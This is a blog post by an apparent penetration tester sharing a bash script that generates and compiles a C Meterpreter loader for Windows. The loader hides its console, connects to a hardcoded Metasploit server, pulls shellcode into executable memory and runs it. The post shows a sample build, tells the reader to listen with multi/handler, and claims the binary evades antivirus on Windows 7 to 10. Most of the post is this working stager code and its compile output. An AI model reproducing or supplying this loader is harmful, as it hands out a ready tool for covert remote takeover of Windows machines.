meterpreter-loader for win targets

This sounds crazy, but I have thought of improving a little an already well made code for meterpreter-loader for Windows targets. Based on the work from Raphael Mudge I have decided to create a little C source code generator that would include hardcoded IP address and port number for our Metasploit server. While the original concept is very good, some automation would be nice. The original article is here : blog.strategiccyber.com/2012/09/13/a-loader-for-metasploits-meterpreter/

The original source code on Github is here :  github.com/rsmudge/metasploit-loader

My modifications are simple, I have added a hardcoded unsigned char variables that get placed into the source code, so that when the final binary gets executed it silently connects to the Metasploit server and loads your favorite windows reverse_tcp payload.

Lets get customized !

customizing-precursorHere is the code, you can place the shellscript anywhere, just make sure you have mingw installed on your linuxbox.

#!/bin/bash
clear
echo "****************************************************************"
echo "    Automatic C source code generator - FOR METASPLOIT          "
echo "           Based on rsmudge metasploit-loader                   "
echo "****************************************************************"  
echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port 

echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <windows.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c 
echo -n 'unsigned char server[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo -n 'unsigned char serverp[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo '    WSADATA    wsaData;' >> temp.c 
echo '    WORD    wVersionRequested;' >> temp.c 
echo '    wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
echo '    if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c 
echo '         printf("ws2_32.dll is out of date.\n"); '>> temp.c 
echo '         WSACleanup(); '>> temp.c 
echo '        exit(1);'>> temp.c 
echo '    }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo '    printf("Bad things: %s\n", error);'>> temp.c 
echo '    closesocket(my_socket);'>> temp.c 
echo '    WSACleanup();'>> temp.c 
echo '    exit(1);' >> temp.c 
echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo '    int    tret   = 0;'>> temp.c 
echo '    int    nret   = 0;'>>temp.c 
echo '    void * startb = buffer;'>> temp.c 
echo '    while (tret < len) {'>>temp.c 
echo '        nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c 
echo '        startb += nret;'>> temp.c 
echo '        tret   += nret;'>>temp.c 
echo '         if (nret == SOCKET_ERROR)'>> temp.c 
echo '            punt(my_socket, "Could not receive data");'>> temp.c 
echo '    }'>>temp.c 
echo '    return tret;'>> temp.c 
echo '}' >> temp.c  
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo '    struct hostent *        target;' >> temp.c 
echo '    struct sockaddr_in     sock;' >> temp.c
echo '    SOCKET             my_socket;'>>temp.c 
echo '    my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo '     if (my_socket == INVALID_SOCKET)'>> temp.c 
echo '        punt(my_socket, ".");'>>temp.c 
echo '    target = gethostbyname(targetip);'>>temp.c 
echo '    if (target == NULL)'>>temp.c 
echo '        punt(my_socket, "..");'>>temp.c 
echo '    memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo '    sock.sin_family = AF_INET;'>> temp.c 
echo '    sock.sin_port = htons(port);'>>temp.c 
echo '    if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo '         punt(my_socket, "...");'>>temp.c  
echo '    return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo '  FreeConsole();'>>temp.c 
echo '    ULONG32 size;'>>temp.c 
echo '    char * buffer;'>>temp.c 
echo '    void (*function)();'>>temp.c 
echo '    winsock_init();'>> temp.c 
echo '    SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c 
echo '    int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo '    if (count != 4 || size <= 0)'>>temp.c 
echo '        punt(my_socket, "read a strange or incomplete length value\n");'>>temp.c 
echo '    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo '    if (buffer == NULL)'>>temp.c 
echo '        punt(my_socket, "could not allocate buffer\n");'>>temp.c 
echo '    buffer[0] = 0xBF;'>>temp.c 
echo '    memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo '    count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo '    function = (void (*)())buffer;'>>temp.c 
echo '    function();'>>temp.c 
echo '    return 0;'>>temp.c 
echo '}' >> temp.c 
echo 'Compiling binary ..' 
i686-w64-mingw32-gcc   temp.c -o payload.exe -lws2_32
ls -la payload.exe 
root@kali:~/htb# ./mploadercreate.sh 
****************************************************************
Automatic C source code generator - FOR METASPLOIT 
Based on rsmudge metasploit-loader 
****************************************************************
Metasploit server IP : 10.10.14.10
Metasploit port number : 443
Compiling binary ..
In file included from temp.c:4:
/usr/share/mingw-w64/include/winsock2.h:15:2: warning: #warning Please include winsock2.h before windows.h [-Wcpp]
#warning Please include winsock2.h before windows.h
^~~~~~~
-rwxr-xr-x 1 root root 292503 Jan 31 04:18 payload.exe
root@kali:~/htb# file payload.exe 
payload.exe: PE32 executable (console) Intel 80386, for MS Windows

Then listen with : msfconsole multi/handler  , and also load your listener with your favorite reverse TCP payload. So far I have tested this on Win7 32bit, Win7 64bit, Win8 64bit and Win10 64bit, it bypasses AVs fine.

refence used : https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/

Enjoy…